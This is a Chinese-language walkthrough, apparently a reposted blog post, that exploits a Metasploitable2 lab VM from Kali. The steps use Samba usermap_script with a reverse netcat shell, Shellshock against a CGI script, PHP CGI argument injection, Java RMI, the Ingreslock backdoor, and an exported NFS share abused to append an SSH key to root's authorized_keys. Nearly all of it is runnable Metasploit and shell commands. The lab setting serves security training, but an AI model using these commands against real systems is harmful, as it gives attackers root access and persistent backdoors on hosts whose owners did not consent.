準備:直接用一個工具包,在虛擬機上直接打開Linux環境,此虛擬機為靶機,

賬號:msfadmin 密碼:msfadmin
設權限sudo passwd root 改root密碼:msfadmin
切換權限:su root 輸密碼:msfafmin
重啟網卡:/etc/init.d/networking restart
xshell連接地址:192.168.1.103(橋接)
一、利用samba 服務漏洞入侵linux主機(samba低版本),對應埠:139、445
靶機IP:192.168.1.103
查看本地服務:netstat -lnt
結合nessus掃描本機的結果出現的漏洞,進行攻擊,
攻擊機:kali,IP:10.0.0.9
1.msfconsole
search samba
use exploit/multi/samba/usermap_script
set payload cmd/unix/reverse_netcat
show options
set rhosts 192.168.1.103
exploit
成功后可在本地直接輸入命令操控對方,
二、CVE-2014-6271 Bash Shellshock(破殼)
Shellshock的原理是利用了Bash在匯入環境變數函式時候的漏洞,啟動Bash的時候,它不但會匯入這個函式,而且也會把函式定義后面的命令執行,在有些CGI腳本的設計中,資料是通過環境變數來傳遞的,這樣就給了資料提供者利用Shellshock漏洞的機會,簡單來說就是由于服務器的cgi腳本呼叫了bash命令,由于bash版本過低,攻擊者把有害資料寫入環境變數,傳到服務器端,觸發服務器運行Bash腳本,完成攻擊,cgi格式檔案是“公共網關介面腳本”型別檔案,
1.準備環境
靶機:metasploitable2(kali)系統,IP:192.168.1.103,
攻擊機:kali,IP:10.0.0.9,
2.靶機上面
cd /usr/lib/cgi-bin/
(創建hello.sh檔案:)
sudo nano hello.sh
(ctrl+x退出)(用vim對hello.sh腳本進行編輯:vim hello.sh)
#! /bin/bash
echo "Content-type: text/html"
echo ""
echo "Hello world!"
(:wq保存)
(保存好后,賦予腳本可執行權限,使用chmod命令:)
sudo chmod 755 hello.sh
(通過瀏覽器訪問該腳本,可以看到成功執行,可以攻擊)
http://192.168.1.103/cgi-bin/hello.sh

3.進入攻擊機msfconsole,
search CVE-2014-6271
use exploit/multi/http/apache_mod_cgi_bash_env_exec
show options

set rhost 192.168.1.103
set targeturi /cgi-bin/hello.sh
exploit

三、PHP CGI漏洞

1.準備環境
靶機:同上
攻擊機kali,IP:10.0.0.9,
2.search cve:2012-1823
use exploit/multi/http/php_cgi_arg_injection
show options
set rhost 192.168.1.103
exploit
四、Java RMI SERVER 命令執行漏洞與java cve-2013-0422
nmap –p 0-65535 IP #查看1099埠是否開啟
use exploit/multi/misc/java_rmi_server
五、Ingreslock 后門
原理:Ingreslock后門監聽1524埠,連接1524埠就可以直接提取root權限,
驗證:在本地機上 Telnet 192.168.1.103 1524
六、NFS Exported Share Information Disclosure
rpcinfo -p 192.168.1.103 #顯示本地系統中注冊到rpcbind協議版本2的所有RPC服務

showmount -e 192.168.1.103 #顯示被掛載的共享目錄
ssh-keygen #生成密鑰
默認密鑰保存地址 (/root/.ssh/id_rsa.pub)
mkdir /tmp/test
mount -t nfs 192.168.1.103:/ /tmp/test
cat /root/.ssh/id_rsa.pub>>/tmp/test/root/.ssh/authorized_keys
ssh root@192.168.1.103
相當于遠程連接
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/297520.html
標籤:其他
上一篇:命令執行總結
